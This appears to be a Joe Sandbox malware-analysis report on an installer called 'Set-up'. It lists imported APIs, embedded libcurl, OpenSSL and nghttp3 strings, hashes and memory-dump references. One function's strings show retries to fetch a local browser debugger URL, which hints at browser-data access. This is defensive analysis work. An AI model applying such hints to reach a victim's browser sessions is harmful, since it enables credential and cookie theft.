                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: $*$???$ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$QUOT string not accepted: %s$Received only partial file: %lld bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%lld out of %lld bytes)$[%s] closing DATA connection$[%s] done, result=%d$control connection looks dead$ftp.c$partial download completed, closing connection$server did not report OK, got %d
                          • API String ID: 39653677-2752486839
                          • Opcode ID: 2badbf614f66e9421094ddb484a10979d929b023c40f5ec1a51d2c99bcd74718
                          • Instruction ID: 135664add525a0ebc8c303df2dc8625388e99088244e54ee85b7aa242df5c7be
                          • Opcode Fuzzy Hash: 2badbf614f66e9421094ddb484a10979d929b023c40f5ec1a51d2c99bcd74718
                          • Instruction Fuzzy Hash: B7F1B2756043009FDB10DF24C981B6ABBE5AFA6704F08897CF8899B2C2E775D944CB63
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B3C9F0
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 00B3CAE9
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B3CB2E
                          • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B3CB3B
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002C), ref: 00B3CB4F
                          Strings
                          • ecdsa-sha2-nistp256, xrefs: 00B3C9E3
                          • Internal error, xrefs: 00B3CD6E
                          • Unknown method type, xrefs: 00B3CD47
                          • The requested method(s) are not currently supported, xrefs: 00B3CC25
                          • Error allocated space for method preferences, xrefs: 00B3CC10
                          • Memory allocation failed, xrefs: 00B3CD50
                          • No algorithm found, xrefs: 00B3CD32
                          • Invalid parameter specified for method_type, xrefs: 00B3CC3A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$memcpymemmovestrchr
                          • String ID: Error allocated space for method preferences$Internal error$Invalid parameter specified for method_type$Memory allocation failed$No algorithm found$The requested method(s) are not currently supported$Unknown method type$ecdsa-sha2-nistp256
                          • API String ID: 2200032093-2296067158
                          • Opcode ID: 73d6973d74cf216bec49ae8337e2bf7b59cee0ffde45eaca970e3baeb13682fe
                          • Instruction ID: 3156749524a20608484c1e4fb2dc4bf539697f3e71d32f30f31765b68af5fc87
                          • Opcode Fuzzy Hash: 73d6973d74cf216bec49ae8337e2bf7b59cee0ffde45eaca970e3baeb13682fe
                          • Instruction Fuzzy Hash: 0BA195719082059FDB109FA5D881B6ABFE4EF45314F2849F9F88ABB251E730ED04D792
                          APIs
                          • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CEEA90
                          • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 00CEEAD9
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CEEB98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _errno_stat64tolower
                          • String ID: Calling OPENSSL_DIR_read("%s")$Given path=%s$calling stat(%s)$file:$file_open$file_open_dir$file_open_stream$localhost/$providers/implementations/storemgmt/file_store.c
                          • API String ID: 3401003986-2019258128
                          • Opcode ID: 07f5128216e029de1d8b4c2f53ac732133db8f794d0df340d55c89d1786c2ad2
                          • Instruction ID: 46acc4df6f859629ba122491c1909209f98e2fb5ea8b06a6bbc0cf5e23c89df4
                          • Opcode Fuzzy Hash: 07f5128216e029de1d8b4c2f53ac732133db8f794d0df340d55c89d1786c2ad2
                          • Instruction Fuzzy Hash: 59716A70A443407BD7207B229C03B6F7AA1AF45794F28092CFC955A2C3F7B5E541E3A2
                          APIs
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8303
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF831C
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8336
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF835C
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF836F
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8389
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF83B6
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF83E4
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8421
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8434
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF8450
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF847A
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF84AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID: `
                          • API String ID: 2803490479-2679148245
                          • Opcode ID: bef356a5559f2b21686d92a1e5b9ae3f96e160b17f5ad2bbc1b358e9e7333a33
                          • Instruction ID: d4e9671a138f769d75bd3670924f652d43248f7e13bd467ef4686abb3a786f07
                          • Opcode Fuzzy Hash: bef356a5559f2b21686d92a1e5b9ae3f96e160b17f5ad2bbc1b358e9e7333a33
                          • Instruction Fuzzy Hash: 5371ADB1808345CFD341EF29C841659BFE0FF89304F168A6ED588DB3A2EB759401DB62
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
                          • API String ID: 0-3171374047
                          • Opcode ID: 94d1aeedc112e5aad799e408bed54377d8f70559da93167b996a61b9fb23ad10
                          • Instruction ID: a9ef3d46ab20991998d882f34cabda3c89f52f7e0a21e3ee40af0f1fd8ed3384
                          • Opcode Fuzzy Hash: 94d1aeedc112e5aad799e408bed54377d8f70559da93167b996a61b9fb23ad10
                          • Instruction Fuzzy Hash: 3EB17A72A04300ABDB119B24C881FBA77E4BF45704F1A813DE8895B282EB75DE84D792
                          APIs
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A620D4
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A622D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: freemalloc
                          • String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
                          • API String ID: 3061335427-1249806554
                          • Opcode ID: a6af2de9d75850f845d55f7720f60b0a92ae5bed8a7268cb4da1b9a991c37cc7
                          • Instruction ID: d5bccd23ce939515ca3f25473c0815c5864d90e3a89e3786c4dfa929b8422594
                          • Opcode Fuzzy Hash: a6af2de9d75850f845d55f7720f60b0a92ae5bed8a7268cb4da1b9a991c37cc7
                          • Instruction Fuzzy Hash: F36192B49097099FDB00EFA8D58979EBBF0FF48314F00881DE598AB341D77999849F92
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00B0499C
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!conn->server,nghttp3_conn.c,00000A08), ref: 00B04A0A
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A2B,?), ref: 00B04A8E
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,00000A2C), ref: 00B04AA3
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->inc == 0 || pri->inc == 1,nghttp3_conn.c,00000A2D), ref: 00B04AB8
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A3E,?), ref: 00B04B1A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert$memcpy
                          • String ID: !conn->server$conn->server$nghttp3_conn.c$pri->inc == 0 || pri->inc == 1$pri->urgency < NGHTTP3_URGENCY_LEVELS
                          • API String ID: 3718630003-1169204258
                          • Opcode ID: b3f4441cb57d87bb9aa5d9d25dc6a2c114c14472b1e1e5cb01d6f56b5bb0dd00
                          • Instruction ID: f5662bbadc154d11cb7e31a78bfc3377bce0cda433f7eddb34119075b2e61539
                          • Opcode Fuzzy Hash: b3f4441cb57d87bb9aa5d9d25dc6a2c114c14472b1e1e5cb01d6f56b5bb0dd00
                          • Instruction Fuzzy Hash: D15126B1B00305AFD7109E29DC46BAB7BE9EF45350F044569FB54861D1D770ED80CBA2
                          APIs
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00AD8C0E,?), ref: 00C145E3
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00AD8C0E,?), ref: 00C1460A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strcmp
                          • String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
                          • API String ID: 1004003707-1524119518
                          • Opcode ID: 0225ebc05ba1f1a58f833c585c23531d812800b2b2f0d547b7b8bddbca43eeae
                          • Instruction ID: b14d55b710af1670a66a24b09c1d84ce31ae517d6696dd192b1609dcded162b9
                          • Opcode Fuzzy Hash: 0225ebc05ba1f1a58f833c585c23531d812800b2b2f0d547b7b8bddbca43eeae
                          • Instruction Fuzzy Hash: 6B41D775F84314B7F63536626D03F9A31999B13F48F150028FD94AA2C3FA95DA90B1E2
                          APIs
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00AC6884
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00AC68AC
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AC68C1
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00AC6973
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00AC6983
                          • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00AC6995
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpystrchr$atoistrlen
                          • String ID: [
                          • API String ID: 444251876-784033777
                          • Opcode ID: 3c117e8bbf4514e875d283bd12d9b1536c1a87c5293fd3673dd4c3715c36b6a5
                          • Instruction ID: 78a97bac2dbf438a415b7eb030cb49a95a0a92b42dd41c99b591a5dfac569bce
                          • Opcode Fuzzy Hash: 3c117e8bbf4514e875d283bd12d9b1536c1a87c5293fd3673dd4c3715c36b6a5
                          • Instruction Fuzzy Hash: 69B1567190C3856BDB39DB258891F7BBBE8EB55304F1A052DF8C9C6181EB35CC448362
                          APIs
                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00A66467
                          Strings
                          • hsts.c, xrefs: 00A6656B, 00A665CF
                          • mite, xrefs: 00A66688
                          • %s%s "%s", xrefs: 00A664AA
                          • %s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00A66540
                          • unlimited, xrefs: 00A664A1
                          • %d%02d%02d %02d:%02d:%02d, xrefs: 00A666D5
                          • # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00A66462
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: fwrite
                          • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
                          • API String ID: 3559309478-3911685517
                          • Opcode ID: 6bdb4031d82edfcd8153abd11c3f6a6c80d8503604b0a0d4da44ae231b01d87d
                          • Instruction ID: 8e9d1b599a0b3f189284bcdbc64f15888006a4d7b987d83f0020aba48a450dbb
                          • Opcode Fuzzy Hash: 6bdb4031d82edfcd8153abd11c3f6a6c80d8503604b0a0d4da44ae231b01d87d
                          • Instruction Fuzzy Hash: 2981E4B2A08301ABEB15DF24DD42B2BB7F9AF94714F08452CF95997252EB31DD10C7A2
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,00ADDB9C,?,00B03BB8,00000000,?,?), ref: 00B06433
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
                          • API String ID: 1222420520-1470553442
                          • Opcode ID: 66f615a7cbb7e5811c5725d1b2585f993a422cd7818caa5d718b28bb7c25d37e
                          • Instruction ID: 57dc527f52e9c6d7ad1a1c710157cfb335b47b023fbb5e16fd0e48bff61be870
                          • Opcode Fuzzy Hash: 66f615a7cbb7e5811c5725d1b2585f993a422cd7818caa5d718b28bb7c25d37e
                          • Instruction Fuzzy Hash: 6F716C70604344AFDB25DF28D895BAE7BE1FF44704F048568F9899B391EB70EA50CB92
                          APIs
                            • Part of subcall function 00A85EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A85ED4
                            • Part of subcall function 00AA4F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00AA4F9E
                          • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00A7EA9B
                            • Part of subcall function 00A806F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00A85663,?), ref: 00A806F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
